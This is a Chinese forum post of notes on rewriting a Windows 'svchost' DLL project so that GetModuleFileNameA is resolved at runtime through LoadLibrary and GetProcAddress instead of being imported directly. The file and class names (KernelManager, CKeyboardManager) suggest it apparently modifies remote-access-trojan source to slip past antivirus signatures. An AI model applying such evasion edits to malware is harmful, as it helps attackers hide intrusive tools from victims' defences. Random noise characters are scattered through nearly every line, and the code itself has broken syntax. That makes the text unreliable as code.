[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记% I! M# t8 F8 m! H& J
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h' d* V" B3 F; q$ i
----------------------------------------. _  c8 }4 N: x2 v7 f' {
DTDY.h：
# N0 m- i3 _. L, R! D1 B8 Y2 L1 k" E5 y+ x; o6 j* t  Z8 F$ Y
#if _MSC_VER>10007 t, v6 e9 g7 o, \- ~+ `
#pragma once, k5 B0 C$ |8 ]; [& `& t- E- x
#endif //_MSC_VER>1000* }2 t3 c. J! b9 @  [
#include<windows.h>, Q; C3 P3 P3 C

- E6 Z/ D) u7 r! L# e. }2 Wtypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);: @- h* N$ @# A  n$ V
class DTDY
0 \2 e7 ?$ d3 P% x- |! @' {+ m{
7 M" M+ |- |, o( ~* ]public:& [" H+ U/ w  D2 n* L8 G& k9 ?& V' e
DTDY();" p* X( d5 x# U0 l
virtual ~DTDY();
6 [; O6 x) Y, x6 J1 a6 gpublic:
9 I" i3 |5 S) F' _6 @% O4 E( wstatic pGetModuleFileNameA MyGetModuleFileName;, Y6 B6 L: J" B3 d# o* T
static BOOL FunInitiallization();
4 x+ n8 y( |0 }};
: X' K( m+ j- J, e0 p#endif( G+ y, ]0 H" ~/ c" {  P
----------------------------------------9 \7 w5 r( [  E4 K, y
1 `- k- `, T6 ]" \+ t6 L
DTDY.cpp:
2 E$ c8 }* t4 B- V& a9 [
3 l0 Y( F) i7 d  Y1 P/ ~0 c#include "DTDY.h"+ ^0 b: K6 r0 m# e+ l- s; O
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
! H  X6 ^- n* E6 _DTDY:TDY()* I/ ~; W4 ^  \
{! ~/ O! }0 }" O: U9 Z
}
/ [. G& [7 s' FDTDY::~DTDY()7 {3 v: t! `# D$ _' H$ R# W
{0 Z4 e  X# Q: o+ I& v- c& _
}
2 C+ b  t5 e) G: D5 ~/ jBOOL DTDY::FunInitiallization(). n. `" r6 m8 z& _3 c% ]
{
/ {$ n5 |' y3 g9 A6 a: S( FHMODULE hModule=LoadLibrary("kernel32.dll");
' A- Q! w" G0 k3 Z& m$ Q, Q, M  _MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
4 X; n; y7 \4 \% B2 E: p2 Gif(!MyGetModuleFileName=) return FALSE;
# `& W1 g% a2 I9 \$ @. B( k% C9 ?  R4 l# b1 Q- c- z
return TRUE;
/ U8 Y: x  ?& u4 c* u) H! H}
1 Y2 B% l+ {3 r# f/ U+ j4 h# l----------------------------------------
7 j: ?/ f! z) {/ G* Xsvchost.cpp:
# A* [, k# U# |& s
& E3 a4 ~3 \( y9 q- f+ b3 W#include "DTDY.h"! F# s# G  Y" A* @+ U9 u* |

0 _' U  |6 j( y. J* c1 F3 Q+ R' @BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)+ T/ z8 T  g) D5 q
{
! [& {# i4 J. ^1 Z/ C9 Y, P) Tswitch(ul_reason_for_call)' O! `3 m+ _' c; c, [6 E
{2 x  Z% x, d3 g  L
case DLL_PROCESS_ATTACH:7 s) r5 ~& ?+ g" T
if(!DTDY::FunInitiallization()) return FALSE;# m( E  `& ]- e8 Q, `
% h. j1 d4 F4 a& x1 N. ^1 H
break;8 j  Q! C5 [7 ]: q: t6 ]
}
* y: ^3 q, v% [}9 C$ J2 P1 f" |8 Z  x. v' Y* [* I) J
) K( l  I( H2 A' t; d+ a: Q

( {6 T+ U# F' Z: H0 n; q: l& \GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
0 S: p! l; d: h: W0 Y  R2 |( A改写为5 E: P) J" |- K- T0 r: B
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
0 ^6 H5 B) J7 ~, f----------------------------------------& ]( X, M6 y8 @1 X$ E
KernelManager.cpp:
( h( b3 p+ `! N! ~2 ?- x7 `8 o" p( j: R( M+ D5 F* Z! _
#include "../DTDY.h"- S2 ~9 u1 r  {: u* X4 |5 `$ D
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
2 o! ?) k1 Q+ h  d改写为
: Y6 [7 X  D  b9 B9 I6 aDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
9 D8 P  A" C" d5 ~+ O  R( a----------------------------------------